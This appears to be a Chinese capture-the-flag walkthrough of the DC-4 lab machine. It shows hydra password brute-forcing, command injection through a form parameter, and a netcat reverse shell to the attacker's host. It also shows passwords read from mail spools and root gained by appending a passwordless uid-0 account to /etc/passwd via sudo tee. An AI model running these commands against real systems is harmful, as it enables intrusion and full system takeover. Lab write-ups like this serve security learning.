描述:
只有一个标志,但从技术上讲,有多个入口点,就像上次一样,没有线索。
192.168.37.133
?
直接 submit 就可以登录
hydra -l admin -P /usr/share/wordlists/rockyou.txt 192.168.37.133 http-post-form "/login.php:username=^USER^&password=^PASS^:S=logout" -f
?
?radio=ls+-l&submit=Run
?radio=du+-h&submit=Run
?nc 192.168.37.128 6666 -e /bin/bash
?
python -c "import pty; pty.spawn('/bin/bash')"
三个可登录用户?
到目前可能就只能爆破,而在根目录下找到两个敏感目录
root
home
但是 root 目录不够权限,而 home 目录可以进入,且发现该目录下的三个
?
192.168.37.133
?
?
?
#!/bin/bash
for i in {1..5}
do
?????????sleep 1
?????????echo "Learn bash they said."
?????????sleep 1
?????????echo "Bash is good they said."
done
?????????echo "But I'd rather bash my head against a brick wall."
?
?
?hydra -l jim -P DC-4_passwd.txt 192.168.37.133 ssh
[22][ssh] host: 192.168.37.133 ? login: jim ? password: jibril04
ssh jim@192.168.37.133
Linux dc-4 4.9.0-3-686 #1 SMP Debian 4.9.30-2+deb9u5 (2017-09-19) i686
The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
You have mail.
Last login: Sun Apr ?7 02:23:55 2019 from 192.168.0.100
登陆后提示发现是 Linux 系统且有一封邮件
cat mbox
这是邮件描述
From root@dc-4 Sat Apr 06 20:20:04 2019
Return-path: <root@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 20:20:04 +1000
Received: from root by dc-4 with local (Exim 4.89)
?????????? ?(envelope-from <root@dc-4>)
?????????? ?id 1hCiQe-0000gc-EC
?????????? ?for jim@dc-4; Sat, 06 Apr 2019 20:20:04 +1000
To: jim@dc-4
Subject: Test
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCiQe-0000gc-EC@dc-4>
From: root <root@dc-4>
Date: Sat, 06 Apr 2019 20:20:04 +1000
Status: ROThis is a test.
由于 Linux 系统
linux用户的邮件存在哪里,在Linux系统中收发及查看邮件_ssslience的博客-CSDN博客系收到邮件都会保存在“/var/spool/mail/[linux用户名]”文件中。linux用户的邮件存在哪里,在Linux系统中收发及查看邮件_ssslience的博客-CSDN博客
cat jim?
?
From charles@dc-4 Sat Apr 06 21:15:46 2019
Return-path: <charles@dc-4>
Envelope-to: jim@dc-4
Delivery-date: Sat, 06 Apr 2019 21:15:46 +1000
Received: from charles by dc-4 with local (Exim 4.89)
?????????? ?(envelope-from <charles@dc-4>)
?????????? ?id 1hCjIX-0000kO-Qt
?? ?????????for jim@dc-4; Sat, 06 Apr 2019 21:15:45 +1000
To: jim@dc-4
Subject: Holidays
MIME-Version: 1.0
Content-Type: text/plain; charset="UTF-8"
Content-Transfer-Encoding: 8bit
Message-Id: <E1hCjIX-0000kO-Qt@dc-4>
From: Charles <charles@dc-4>
Date: Sat, 06 Apr 2019 21:15:45 +1000
Status: OHi Jim,
I'm heading off on holidays at the end of today, so the boss asked me to give you my password just in case anything goes wrong.
Password is: ?^xHhA&hvim0y
See ya,
Charles
可以从邮件中知道查尔斯给 jim 留下了密码,Charles 也同样是我们之前所得到的三个用户之一
su charles
?
可以看到第一个命令为 -a,可以不用覆盖原内容将东西直接加入到指定文件
第三个域为 root 的?gid?
?
第二个密码域放空,第三个 uid 和第四个 gid 分别使用 root 的 uid 和 gid,直接添加一个新的管理员在 Linux 用户表中
echo "Sherlock::0:0:::/bin/bash" | sudo teehee -a /etc/passwd
?
?
?
?
?